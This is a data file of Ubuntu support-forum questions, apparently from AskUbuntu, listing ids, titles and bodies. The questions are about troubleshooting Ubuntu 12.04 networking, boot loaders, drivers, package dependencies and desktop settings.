179965	running 12.04 as a gateway - resolvconf , dhclient and dnsmasq integration	i have a gateway server which is set up originally with ubuntu desktop 12.04 - perhaps a mistake , i do n't know , something to bear in mind . i ripped out network-manager and now want to get resolvconf , dhclient and dnsmasq to play well together . dhclient gets the gateway 's eth0 wan ip address and the isp dns name server address from the modem . dnsmasq needs to serve dhcp to the rest of the lan on eth1 and acts as a dns cache both for the lan and for the gateway machine . i also set up iptables as a firewall . right now , the gateway 's /etc/resolv.conf shows only name server 127.0.0.1 which is correct afaik . however i do n't think that dhclient is giving dnsmasq the isp dns name server nor is dnsmasq picking up the opendns and google name servers i specified in /etc/network/interfaces - at the moment look-ups , i.e. , ping or surfing , do n't work unless i manually edit /etc/resolv.conf to put in an upstream name server like 8.8.8.8 so i removed the resolvconf package . now i 'm not getting dhcp on my lan and i 'm not able to do dns look-ups on the host itself - i can surf and ping on the net , but not 127.0.0.1 . where do i go from here ? this setup with the config for dhclient and dnsmasq , and the same resolv.conf and hosts files worked on my old debian box .
179968	how to add yahoo account to claws mail	i 've seen a post that claws mail is very light . so i 've downloaded that and installed in my ubuntu 12.04 . but while trying to add my yahoo account its does n't behaving like thunderbird client . so all i need to configure manually and i did it but i 'm not getting any mails download from yahoo server . i 'm not getting the issue . thanks for any advice .
179973	how can i tell which partition is for ubuntu and which is for windows ?	i am installing 12.04 alongside windows 7 , and i am trying to figure out this screen on the installer : my question is , which segment is windows and which will be for ubuntu ? how can you tell ?
179975	software center crashes repeatedly	my software center in ubuntu 12.04 crashes repeatedly and i have to force close it . i have tried reinstalling , but the issue is not resolved . please help to resolve the same .
179977	brightness adjustment not working on a samsung np300e5za0pin	recently installed ubuntu 12.04 on my samsung np300e5za0pin laptop . brightness function is not fully functioning , and it will not bring down below 70 % when i press the fn++brighness . brightness automatically becomes 100 % and then again loss of battery . please give some suggestion to solve the problem ! !
179979	is it possible to upgrade ubuntu 12.04 to 12.04.1 ?	i want to upgrade to 12.04.1 from 12.04 lts . is it possible ? if possible then how ?
179987	low sound issues on hp p7-1227c pc using idt 92hd73e1x5 chip	anyone else ever encountered issues with low sound ? installed a fresh new install of ubuntu 12.04 x64 alongside win7 . everything runs great except for the sound . computer is a hp pavilion p7-1227c . what i 've tried : i 've also tried adding the latest audio ppa . reinstalling alsa and alsa-mixer check the settings in system - > sound attempted to unmute and amplify the speakers , headset etc modified settings in pavucontrol attempted this solution : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/271519 also , this is my alsa output : http : //www.alsa-project.org/db/ ? f=de7e2bfb645f4fa5c2687ad6742d7ccdfb8fe6ec any ideas ? i just installed a new install of ubuntu 12.04 on this particular computer . aplay -l : **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : generic [ hd-audio generic ] , device 1 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsmod | grep snd snd_hda_codec_idt 70795 1 snd_hda_intel 33773 3 snd_hda_codec 127706 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 15 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lspci -v | grep -a7 -i `` audio '' 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) subsystem : hewlett-packard company device 2ae0 flags : bus master , slow devsel , latency 32 , irq 16 memory at feb40000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel
179990	multiple wordpress blogs in 12.04	i 've got an ubuntu server hosted up at amazon . i 'm using virtual hosts , and i already have that somewhat set up . ( i.e . wiki.mydomain.com is my mediawiki which is running ) . i 'm installing mediawiki per https : //help.ubuntu.com/community/wordpress and i can easily get one blog going . however , i 'm confused by the line also if you plan on hosting multiple blogs with different virtual hosts , each needs a differently named database , which would be achieved in the same way . i want to have two blogs , ideally at blog1.mydomain.com and blog2.mydomain.com , but i would settle for blogs.mydomain.com/blog1 and blogs.mydomain.com/blog2 i just ca n't tell how to do this . do i just run the install script multiple times ? wo n't i need two folders in /var/www that have separate symlinks ? if anyone has done this , i would appreciate a little help . i 've done a ton of development , but this is my first lamp server so i 'm a little lost .
179991	controlling gnome-shell notifications message tray	i am using gnome-shell with 12.04 and find the notification system very disruptive and cumbersome . a suggestion from a previous post was to turn off notifications in the user menu , which appears to work , but this mysteriously gets turned back on with no input from me . is there a way to better control the tray and keep these popups from happening ?
179995	do i need to backup my 12.04 system to upgrade to 12.04.1 ?	i want to upgrade to the new version of ubuntu 12.04.1 lts , and i need to know if a backup of my system is needed . my system : ubuntu : 12.04 ( precise ) 32-bit gnome : 3.4.2 kernel linux : 3.5.2-030502-generic processor : intel® pentium ( r ) dual cpu e2220 @ 2.40ghz × 2
180000	how do i remove the youtube unity lens ?	i installed the youtube scope and lens using these commands in terminal : sudo add-apt-repository ppa : atareao/lenses sudo apt-get update & & sudo apt-get install yavol scope-youtube every time i open the dash , the same batch of videos are are displayed under `` videos '' and when i try searching for a video , the same videos are still displayed . i 'd like to remove this lens , but when i search for it in the software center , its nowhere to be found . help removing the lens would be appreciated .
180001	how do i change the keyboard layout ?	my keyboard is behaving weirdly . i suppose my keyboard layout which was us by default has been changed to another format . also a very strange sound is coming from my laptop every time when its booting . please help me .
180002	how to temporarily stop and start gnome ?	i am looking to just force my box to end all gui instances for server usage . i want to be able to start them back up again for desktop usage later on . i have tried : sudo /etc/init.d/gdm stop sudo service gdm stop sudo service gnome stop sudo service gdm stop gdm : unrecognized service sudo service gnome stop gnome : unrecognized service sudo /etc/init.d/gdm stop sudo : /etc/init.d/gdm : command not found
180013	flash videos break or stutter ubuntu 12.04	i am using ubuntu 12.04 ( freshly installed , not upgraded ) and with my mozilla i downloaded the adobe flash player file and placed it in a folder called 'plugins ' after creating it in the firefox folder . now the problem is , that while watching videos on web ( youtube , vimeo or anywhere else ) , sometimes ( randomly ) these videos will start breaking up or should i say stuttering . the audio in the rest of the system works fine . i mean i can listen to my music stored in my hdd and can watch videos saved already . this problem remains until i do a complete system restart . not even restarting browser helps . i also have chrome installed and once it happens on one browser , it continues on both the browsers . also , if i download the same video ( while stuttering ) , using some add ons , the video plays fine ( using either totem or vlc ) . in the beginning , it used to happen once in a blue moon , but now its happening regularly after i watch two or three videos one after another . please help : ) i have an acer aspire netbook d250 .
180017	screen not centered on the monitor	i just installed ubuntu 12.04 and my screen is somehow not centered . its moved one or two inch to the right of the monitor . i only see half of shutdown , restart , switch user options ( luckily i see enough to shutdown computer ) .
180018	ubuntu software center ( 12.04 ) error	almost every time i try to download from ubuntu software center it claims that files are all 380.5mb on the first attempt to download . even when downloading programs like chromium which is really 24.1 mb . so i have to cancel the download and on the second try it gets it right . can someone explain how to stop this ?
180019	how do i change the default working directory with which gnome-terminal opens ?	there does not seem to be any way to change this in the gui .
180023	can i install grub on an usb and make it a rescue disk ?	can i install grub on an usb and make it a rescue disk ? question : is it safe to run the following commands ? sudo grub-install /dev/sdb ( where sdb is my usb drive ) update-grub2 question : would i really get a grub menu from usb ( provided that it boot first at my bios ) whenever i can not boot from my hard disk ? question : does update-grub2 delete itself from one drive when installing to another , will i boot from hard disk also than from usb , depending on my bios options ?
180025	i broke `apt-get` ( and other stuff ... maybe )	sometime ago i installed codeblocks using this guide . today i tried to do it on my computer , but something went wrong . codeblocks is n't working ( nor apt-get ) . whenever i run it , i receive this message : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : codeblocks : i386 : depends : libatk1.0-0 : i386 ( > = 1.20.0 ) but it is not installed depends : libc6 : i386 ( > = 2.7-1 ) but it is not installed depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not installed depends : libglib2.0-0 : i386 ( > = 2.12.0 ) but it is not installed depends : libgtk2.0-0 : i386 ( > = 2.12.0 ) but it is not installed depends : libpango1.0-0 : i386 ( > = 1.20.3 ) but it is not installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not installed depends : libwxbase2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : codeblocks-common : i386 ( = 10.05-1 ) but it is not installable recommends : gcc : i386 but it is not installed or g++ : i386 but it is not installed recommends : gdb : i386 but it is not installed codeblocks-contrib : i386 : depends : libatk1.0-0 : i386 ( > = 1.20.0 ) but it is not installed depends : libbz2-1.0 : i386 but it is not installed depends : libc6 : i386 ( > = 2.7-1 ) but it is not installed depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not installed depends : libglib2.0-0 : i386 ( > = 2.12.0 ) but it is not installed depends : libgtk2.0-0 : i386 ( > = 2.12.0 ) but it is not installed depends : libpango1.0-0 : i386 ( > = 1.20.3 ) but it is not installed depends : libstdc++6 : i386 ( > = 4.2.1 ) but it is not installed depends : libwxbase2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : libx11-6 : i386 but it is not installed depends : zlib1g : i386 ( > = 1:1.2.3.3.dfsg ) but it is not installed depends : codeblocks-contrib-common : i386 ( = 10.05-1 ) but it is not installable codeblocks-dev : i386 : depends : codeblocks-headers : i386 ( = 10.05-1 ) but it is not installable libcodeblocks0 : i386 : depends : libc6 : i386 ( > = 2.7-1 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not installed depends : libwxbase2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : binutils : i386 ( > = 2.14.90.0.7 ) but it is not installed depends : file : i386 but it is not installed depends : libmagic1 : i386 but it is not installed depends : libncurses5 : i386 but it is not installed depends : zlib1g : i386 but it is not installed libwxsmithlib0 : i386 : depends : libc6 : i386 ( > = 2.7-1 ) but it is not installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not installed depends : libstdc++6 : i386 ( > = 4.1.1 ) but it is not installed depends : libwxbase2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed depends : libwxgtk2.8-0 : i386 ( > = 2.8.10.1 ) but it is not installed wxsmith-dev : i386 : depends : wxsmith-headers : i386 ( = 10.05-1 ) but it is not installable e : unmet dependencies . try using -f. well , as suggested i tried using sudo apt-get -f install and this appeared reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libglib2.0-0 : i386 libc6 : i386 libpcre3 : i386 libncurses5 : i386 libx11-6 : i386 libgcc1 : i386 libstdc++6 : i386 zlib1g : i386 libatk1.0-0 : i386 libtinfo5 : i386 libgpm2 : i386 libselinux1 : i386 gcc-4.6-base : i386 libffi6 : i386 valgrind : i386 libc6-dbg : i386 libxcb1 : i386 libxau6 : i386 libxdmcp6 : i386 libwxbase2.8-0 : i386 libexpat1 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : gcc-4.6-base : i386 libatk1.0-0 : i386 libc6 : i386 libc6-dbg : i386 libexpat1 : i386 libffi6 : i386 libgcc1 : i386 libglib2.0-0 : i386 libgpm2 : i386 libncurses5 : i386 libpcre3 : i386 libpython3.2 libselinux1 : i386 libstdc++6 : i386 libtinfo5 : i386 libwxbase2.8-0 : i386 libx11-6 : i386 libxau6 : i386 libxcb1 : i386 libxdmcp6 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimal valgrind : i386 zlib1g : i386 suggested packages : glibc-doc : i386 locales : i386 gpm : i386 python3-doc python3-tk python3.2-doc binfmt-support kcachegrind : i386 alleyoop : i386 valkyrie : i386 recommended packages : gdb : i386 the following packages will be removed : activity-log-manager-control-center aisleriot apparmor apport apport-gtk apt-xapian-index aptdaemon apturl apturl-common bluez bluez-alsa bluez-gstreamer checkbox checkbox-qt codeblocks : i386 codeblocks-contrib : i386 codeblocks-contrib-dbg : i386 codeblocks-dbg : i386 codeblocks-dev : i386 command-not-found compiz compiz-gnome compiz-plugins-main-default compizconfig-backend-gconf deja-dup duplicity eog evolution-data-server file file-roller firefox firefox-globalmenu firefox-gnome-support flashplugin-installer foomatic-db-compressed-ppds gconf2 gdb gedit gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-ubuntuoneui-3.0 gksu gnome-bluetooth gnome-control-center gnome-media gnome-menus gnome-orca gnome-sudoku gnome-terminal gnome-terminal-data gnome-user-share gstreamer0.10-gconf gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hplip hplip-data ibus ibus-pinyin ibus-table indicator-datetime indicator-power jockey-common jockey-gtk landscape-client-ui-install language-selector-common language-selector-gnome launchpad-integration libcanberra-gtk-module libcanberra-gtk3-module libcodeblocks0 : i386 libcompizconfig0 libfolks-eds25 libgksu2-0 libgnome-media-profiles-3.0-0 libgnome2-common libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libmetacity-private0 libpeas-1.0-0 libpurple-bin libpython2.7 libreoffice-gnome librhythmbox-core5 libsyncdaemon-1.0-1 libtotem0 libubuntuoneui-3.0-1 libwxsmithlib0 : i386 libwxsmithlib0-dev : i386 light-themes lsb-release metacity metacity-common nautilus-share network-manager-gnome nvidia-common onboard oneconf openprinting-ppds printer-driver-foo2zjs printer-driver-postscript-hp printer-driver-ptouch printer-driver-pxljr printer-driver-sag-gdi printer-driver-splix python python-appindicator python-apport python-apt python-apt-common python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-brlapi python-cairo python-chardet python-configglue python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-defer python-dirspec python-egenix-mxdatetime python-egenix-mxtools python-gconf python-gdbm python-gi python-gi-cairo python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gst0.10 python-gtk2 python-httplib2 python-ibus python-imaging python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libxml2 python-louis python-mako python-markupsafe python-minimal python-notify python-oauth python-openssl python-packagekit python-pam python-pexpect python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi2 python-pycurl python-pyinotify python-renderpm python-reportlab python-reportlab-accel python-serial python-simplejson python-smbc python-software-properties python-speechd python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-ubuntu-sso-client python-ubuntuone-client python-ubuntuone-control-panel python-ubuntuone-storageprotocol python-uno python-virtkey python-wadllib python-xapian python-xdg python-xkit python-zeitgeist python-zope.interface python2.7 python2.7-minimal rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone sessioninstaller software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk system-config-printer-common system-config-printer-gnome system-config-printer-udev totem totem-mozilla totem-plugins ubuntu-artwork ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-standard ubuntu-system-service ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-couch ubuntuone-installer ufw unattended-upgrades unity unity-2d unity-common unity-lens-applications unity-lens-video unity-scope-musicstores unity-scope-video-remote update-manager update-manager-core update-notifier update-notifier-common usb-creator-common usb-creator-gtk wxsmith-dev : i386 xdiagnose xul-ext-ubufox zeitgeist zeitgeist-core zeitgeist-datahub the following new packages will be installed : gcc-4.6-base : i386 libatk1.0-0 : i386 libc6 : i386 libc6-dbg : i386 libexpat1 : i386 libffi6 : i386 libgcc1 : i386 libglib2.0-0 : i386 libgpm2 : i386 libncurses5 : i386 libpcre3 : i386 libpython3.2 libselinux1 : i386 libstdc++6 : i386 libtinfo5 : i386 libwxbase2.8-0 : i386 libx11-6 : i386 libxau6 : i386 libxcb1 : i386 libxdmcp6 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimal valgrind : i386 zlib1g : i386 warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! python-minimal python2.7-minimal ( due to python-minimal ) 0 upgraded , 27 newly installed , 246 to remove and 1 not upgraded . 9 not fully installed or removed . need to get 30.8 mb of archives . after this operation , 284 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' well ... that 's a scary error . but manly as ** i typed : yes , do as i say ! let 's just say i had to reinstall ubuntu after that . and here i am , trying to install codeblocks again , and it happened all over again , but this time i did n't type `` yes , do as i say ! '' would you kindly help me fix this ?
180028	put icon for wireless on desktop	i am running ubuntu 10.0.4 i am disabling the gnome top panel , but want to put a icon on the desktop to connect to wireless . is there a way to do this ?
180029	could not write metadata for '/website_1'./var/www/.metadata ( permission denied )	when ever i open eclipse to work , i get the following message could not write metadata for '/website_1'./var/www/.metadata/.pluginsorg.eclipse.core.resources/.projects/website_1/.markers.snap ( permission denied ) i click ok but it appears again . actually it seems that somehow the application user of eclipse seems not to have permission on changing the project files of eclipse . but i am not sure , because i am really new to ubuntu . can anyone help me please ? ty
180033	how to add different drive ubuntu to bcd manually	i want to add 12.04 that is in a different drive to my active bcd store . what i did is : i added a boot sector application pointing to c : \boot\ubuntu\boot.img and i only get a black screen with grub > i also copied the mbr to a file and added to bcd and i get the same results . i donât want to use easybcd for learning purposes .
180035	can not log in to ubuntu forums and can not contact administrator	i have a dilemma . i ca n't log in to ubuntu forums using my user name . when i try to recover my password . it says my email is not in the system . it says i can contact the administrator . when i click on the link to contact the administrator , it says i have to be logged in . i believe i was in the midst of setting up and account after signing in with launchpad . the process never completed , so i do n't have a password . i 'm pretty sure the user name i 'm trying to use does not belong to anyone else .
180036	where can i get a version if ubuntu compatible with a laptop running me	i have a laptop that , at the moment , runs windows millenium edition . i have been looking and do not know which versions of ubuntu will work on it , or where to get it from . the problem worsens , as my laptop does not have a usb drive , and can only receive info through the cd drive or through the internet ( that does n't have security )
180039	bootloader has disappeared after reinstalling windows and ubuntu	i was having trouble with my windows 7 and could not access the router so i installed ubuntu 12.04 lts to see if i could network on that , and i could . after much ado i decided that the best course of action would be to reinstall windows 7 , but i lost the option of booting onto ubuntu . the thing is , i really liked ubuntu and wanted to keep using it alongside windows . i decided to just reinstall ubuntu from the cd , thus losing all the wee extras i had added . lo and behold the pc still boots straight into windows 7 with no option to go into ubuntu , what can i do ?
180042	how do i install ubuntu 12.04 on my asus 1225c netbook ?	i had to wait a month to receive my asus 1225c netbook from adorama camera and was disappointed to find that it comes without ubuntu installed . i have eeebuntu 12.04 on a flash drive but the 1225c will not boot from it . so how do i install ubuntu ? also , anyone thinking of buying this from adorama camera , be warned that they sell the 1225c without an operating system and the bios has no option for installation from a usb stick . after going back to their website i do see that they do say `` no os '' so it is my fault for not reading more carefully .
180045	problem with session indicator	i 'm using unity de . i removed packagekit : apt-get remove packagekit* ( ok. it 's bad idea ... ) after this action a lost session indicator on top right panel : i know , i remove package for session , but i do n't know what packet.. p.s . i have some troubles in kde , ca n't restart , shutdown , logout , etc
180048	how do i install gmsh ?	i am trying to install gmsh in 12.04 x64 : xxx @ sjb-linux : /320/installslinux/gmsh $ sudo apt-get install gmsh reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gmsh : depends : libmed1 ( > = 3.0.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . xxx @ sjb-linux : /320/installslinux/gmsh $ i have now tried all the advice i could get sudo apt-get -f install sudo apt-get clean with no success , these commands report absolutely no problem . i 'll appreciate help .
180049	external hard drive opens with puddletag and not nautilus	i am using gnome-shell 3.4 my external hard drive prompts to open with puddletag and when i clock on my removeable devices , they open with puddletag . why is this ?
180053	how do you uninstall wine 1.5 ?	i installed wine through the terminal using these commands : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.5 i know that i 've removed at least part of wine . i removed the .wine folder in my home folder and i managed to remove the repository via this command : sudo apt-add-repository -- remove ppa : ubuntu-wine/ppa now when i try to install wine 1.4 via ubuntu software center , it tells me i must remove these items to install wine : microsoft windows compatibility layer ( binary emulator and library ) wine1.5 microsoft windows compatibility layer ( 64-bit support ) wine1.5-amd64 microsoft windows compatibility layer ( 32-bit support ) wine1.5-i386 : i386 i 've already tried this command : sudo apt-get -- purge remove wine but it said that wine was n't installed . some assistance would be appreciated .
180063	update bios in asus k55 laptop	i would like to update my laptop bios from ubuntu , cause i have no other os in the machine . the problem is that asus provide only a windows bios-update program : http : //www.asus.com/notebooks/versatile_performance/k55vm/ # download has anyone tried to do this from ubuntu in an asus laptop ? thanks .
180069	stop grub os-prober from finding a disk	i 've recently installed ubuntu on a ssd , and would like to remove the old grub entries belonging to the ubuntu on the old hdd . i 'd like to do one of the following : remove the entry from grub ( preferably without deleting /etc/grub.d/10_linux ) remove the files in the old hdd that tell the grub os-prober that this is an os . any help would be much appreciated .
180071	why does ubuntu ask me for a username and password when i have n't made an account yet ?	i have ubuntu server installed as well and i am trying to install desktop by booting off of cd but when the desktop cd finishes loading , it asks me for a username and password at login . i tried using my username and assword from ubuntu server but it says `` password invalid ''
180077	disable grub 2 and plymouth	i have a dual-boot system with linux 12.04 and windows 7 . i use windows boot manager , which i configured with easybcd through windows . now , when i start up ubuntu , grub appears , making me choose ubuntu again . how can i disable grub ? i would like to disable plymouth as well , because my resolution ( 1366x768 ) is not supported at all , and i already gave up trying to fix it . thank you very much !
180079	ctrl -c , ctrl -v not working in different keyboard layout	when i am in english , ctrl+c , ctrl+v works fine when i need to copy paste . but when i turn to greek , ctrl+c and ctrl+v and basically no shortcut almost works in greek . so each time i have to alt shift and go back to english in order to user ctrl+c to copy something . how can i apply this to the greek keyboard profile ? edit i also realized that when using netbeans ide 7.4 , i can copy and paste in greek but i ca n't use the tonic system of the language over the words . in aptana studio i ca n't use copy and paste ctrl+c , ctrl+v when using gedit everything works fine . different software use different keyboard layout settings ?
180086	no sound through hdmi with an ati mobility	specs : asus g73jh i7/720 ; ati mobility 5870 i have read through a lot of threads on getting hdmi sound to work and non of them have fixed my issue . granted i am very new to linux and know only the gui aspect of what it does from finding similarities that windows 7 has . i would like to become a linux power user and i figured this would be a good step to get started . i was able to successfully install my graphics driver and it shows in use . i connect the hdmi to my hd tv and i get no sound . i do n't care about auto switch for sound , that would be great but not necessary . i just want my sound to work through the hdmi . what i have tried : changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' pact set-card-profile 0 output : hdmi-surround failure : no such entity sound settings : right-click sound indicator â sound settings â output tab , and set digital output ( s/pdif ) built in audio speakers built in audio i only get 2 settings . if i right-click the area below those 2 in the `` play sound through '' box , i get no `` show hidden devices '' . i am also doing all this with the hdmi connected to eliminate any possibility for error .
180094	is there a way to make dig report the actual name server rather than 127.0.0.1 ?	with resolvconf , dig always shows the loopback address . is there anyway to see which server is actually answering ?
180096	wifi selective proxy server	i use dropbox to backup files on my 12.04 laptop . currently , whenever dropbox has an internet connection it syncs . this is an issue when i am tethering with my mobile because of the cost of mobile data . the dropbox application does n't let me choose which wifi networks to use but i can use a proxy server . so i was thinking i could setup a local proxy server with wifi rules . does anyone know of a proxy server which has network rules based on wifi ? or does anyone have a better option for limiting dropbox to particular wifi networks ? apart from simply closing dropbox ; )
180104	accelerated graphics with an nvidia card	how can i get a program like glxgears to run on my computer ? i 've tried installing nvidia proprietary drivers ( which reduce the resolution to 640x480 ) and bumblebee to no avail . when i run optirun glxgears with bumblebee , bumblebee-nvidia , and nvidia-current installed it fails with : [ 2654.015008 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 2654.015090 ] [ error ] aborting because fallback start is disabled . i 've read many other questions that seem to relate to my issue , but none of the answers have worked for me . it seems like one of the most common answers was that it is impossible to switch graphics with this kind of card , so in that case how should i go about disabling it and relying on the intel card ? i 'm running ubuntu 12.04 on an hp pavilion dv6t-7000 with an nvidia geforce gt 630m and am not a very experienced ubuntu user , so if i 'm missing any critical information please point it out and i will happily provide it .
180106	ca n't boot into 12.04	my laptop is benq with windows xp . the cd-rom is not working and my bios ca n't support booting from usb . what should i do ? i tried to mount the iso file that i downloaded . it auto-runs and prompts me to either ( 1 ) reboot now , ( 2 ) reboot later , or ( 3 ) help to start up the live cd ( it is mounted by daemon tools ) . when i choose to reboot now ( or reboot later and reboot it ) , it reboots and nothing happens and it boots windows xp . when i choose to help start up the live cd , it pops out an error string index out of range once it finished and it said to reboot pc , so i rebooted and there was no option to choose ubuntu . help me please .
180107	installing binutils-2.22 on ubuntu 10.04	i am trying to install binutils-2.22 on ubuntu 10.04 . i have downloaded the source code of binutils-2.22 , configured it with a custom prefix ( to not conflict with the system binutils ) and built it . however , i am having trouble linking programs with the new binutils . a program that linked just fine with the system binutils , now gives the following errors at link time : /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxext.so.6 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxrender.so.1 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxinerama.so.1 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxi.so.6 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxrandr.so.2 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxcursor.so.1 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxcomposite.so.1 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxdamage.so.1 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxfixes.so.3 , needed by /usr/lib/../lib32/libgtk-x11-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libpcre.so.3 , needed by /usr/lib/../lib32/libgio-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libresolv.so.2 , needed by /usr/lib/../lib32/libgio-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libselinux.so.1 , needed by /usr/lib/../lib32/libgio-2.0.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libpixman-1.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libdirectfb-1.2.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libfusion-1.2.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libdirect-1.2.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxcb-render-util.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxcb-render.so.0 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libxcb.so.1 , needed by /usr/lib/../lib32/libcairo.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libice.so.6 , needed by /usr/lib/../lib32/libsm.so , not found ( try using -rpath or -rpath-link ) /home/ < myname > /programs/binutils/binutils-2.22/bin/ld : warning : libuuid.so.1 , needed by /usr/lib/../lib32/libsm.so , not found ( try using -rpath or -rpath-link ) followed by a slew of `` undefined reference '' errors . do i need to do some additional configuration to get binutils-2.22 to work ?
180110	installing windows8 as a guest os , all i get is a windows logo and black screen , any suggestions ?	windows 8 , does the initial install , then says , system must restart . once it does n't it just shows windows in white , with an all black background . and just sits there . screenshot : i tried turning off the guest , and turning it back on . after about 5 attempts , it says the os has failed to load to many times , and you need to use recovery tools . im not sure why , every guide says its easy . any ideas ?
